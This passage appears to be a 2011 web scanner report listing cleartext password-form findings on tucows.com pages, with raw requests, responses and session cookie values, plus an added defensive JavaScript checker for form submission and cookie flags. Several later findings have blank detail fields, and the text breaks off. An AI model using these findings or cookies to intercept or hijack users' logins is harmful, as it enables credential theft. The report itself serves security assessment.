Note: the action is a javascript: URL and the form is actually submitted by its onsubmit handler, submitSignup(this) (see the signup form in the response below). The report does not show where that handler posts, but the page and the script it loads are themselves delivered over clear-text HTTP, so an on-path attacker can rewrite the handler and choose the destination; the rating stands regardless. Confirm the handler's real endpoint before reporting it.

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
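The following is an added example, not part of the report and not code from tucows.com. It turns the issue background and remediation above into an offline check: find every form that carries a password field, decide whether the credentials leave the browser in cleartext (treating a javascript: or empty action on an http:// page as cleartext, for the reason noted in 2.1), and report whether the session cookie carries the Secure and HttpOnly flags. The markup and header below are a constructed excerpt of the response recorded in 2.1 (cookie value abbreviated); the HTTPS comparison case and the function names parseAttrs, findPasswordForms, classifySubmission, parseSetCookie and assessPage are introduced here.

```javascript
// Added example: offline check for cleartext password submission and cookie flags.
// Sample input is a constructed excerpt of the response recorded in finding 2.1.

const SAMPLE_PAGE_URL = 'http://www.tucows.com/';
const SAMPLE_SET_COOKIE = [
  '66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh...; path=/',   // value abbreviated
];
const SAMPLE_HTML = `
<div id="signup" style="visibility: hidden;">
  <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
    <input type="password" name="pw" size="20" maxlength="20" value="" />
    <input type="password" name="pwc" size="20" maxlength="20" value="" />
  </form>
</div>
<div id="signin" style="visibility: hidden;">
  <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
    <input type="password" name="pw" size="20" maxlength="20" value="" />
  </form>
</div>`;

// Parse name="value" / name='value' attributes out of a tag's attribute text.
function parseAttrs(attrText) {
  const attrs = {};
  const re = /([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)')/g;
  let m;
  while ((m = re.exec(attrText)) !== null) {
    attrs[m[1].toLowerCase()] = m[2] !== undefined ? m[2] : m[3];
  }
  return attrs;
}

// Find every <form> containing at least one <input type="password">.
// Regex-based on purpose: adequate for scanner output, not a general HTML parser.
function findPasswordForms(html) {
  const forms = [];
  const formRe = /<form\b([^>]*)>([\s\S]*?)<\/form>/gi;
  let m;
  while ((m = formRe.exec(html)) !== null) {
    const attrs = parseAttrs(m[1]);
    const passwordFields = [];
    const inputRe = /<input\b([^>]*)>/gi;
    let im;
    while ((im = inputRe.exec(m[2])) !== null) {
      const ia = parseAttrs(im[1]);
      if ((ia.type || '').toLowerCase() === 'password') passwordFields.push(ia.name || '(unnamed)');
    }
    if (passwordFields.length > 0) {
      forms.push({ id: attrs.id || null, action: attrs.action || '', onsubmit: attrs.onsubmit || null, passwordFields });
    }
  }
  return forms;
}

// Decide whether the credentials leave the browser in cleartext. A javascript: or empty
// action means a script (or the page URL itself) picks the destination; on an http:// page
// that script was fetched in cleartext too, so an on-path attacker decides where the
// password goes. Treat that as cleartext.
function classifySubmission(pageUrl, form) {
  const action = form.action.trim();
  if (action === '' || /^javascript:/i.test(action)) {
    return pageUrl.startsWith('https://') ? 'script-handled-over-https' : 'cleartext';
  }
  let target;
  try { target = new URL(action, pageUrl); } catch (e) { return 'invalid-action'; }
  return target.protocol === 'https:' ? 'encrypted' : 'cleartext';
}

// Parse Set-Cookie header values and report the Secure / HttpOnly flags.
function parseSetCookie(values) {
  return values.map((raw) => {
    const parts = raw.split(';').map((p) => p.trim());
    const eq = parts[0].indexOf('=');
    const name = eq >= 0 ? parts[0].slice(0, eq) : parts[0];
    const flags = parts.slice(1).map((p) => p.split('=')[0].toLowerCase());
    return { name, secure: flags.includes('secure'), httpOnly: flags.includes('httponly') };
  });
}

// Combine both checks for one recorded page.
function assessPage(pageUrl, setCookieValues, html) {
  const forms = findPasswordForms(html).map((f) => ({ ...f, verdict: classifySubmission(pageUrl, f) }));
  const cookies = parseSetCookie(setCookieValues);
  return { forms, cookies };
}
```

Run assessPage(SAMPLE_PAGE_URL, SAMPLE_SET_COOKIE, SAMPLE_HTML) to reproduce findings 2.1 and 2.2: both forms come back cleartext, and the session cookie is set without Secure or HttpOnly, which is the cookie half of the remediation paragraph above. The verdict 'script-handled-over-https' is deliberately not 'encrypted': on an HTTPS page a script-driven form still has to be read to learn where it posts.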

2.2. http://www.tucows.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
javascript:void(null);
The form contains the following password field:
pw

Request

GET / HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:26:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84746

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.3. http://www.tucows.com/about.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
javascript:void(null);
The form contains the following password fields:
pw
pwc

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.4. http://www.tucows.com/about.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /about.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
javascript:void(null);
The form contains the following password field:
pw

Request

GET /about.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:05 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.5. http://www.tucows.com/advertise.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
javascript:void(null);
The form contains the following password fields:
pw
pwc

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.6. http://www.tucows.com/advertise.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /advertise.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
javascript:void(null);
The form contains the following password field:
pw

Request

GET /advertise.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:10 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 31096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.7. http://www.tucows.com/affiliate/index.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.8. http://www.tucows.com/affiliate/index.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /affiliate/index.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /affiliate/index.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.9. http://www.tucows.com/author_ratings.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password fields:

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.10. http://www.tucows.com/author_ratings.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /author_ratings.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /author_ratings.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 34091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Tucows Download</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

2.11. http://www.tucows.com/contact.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /contact.html HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:27:06 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 33706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Contact Us</title>
<
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
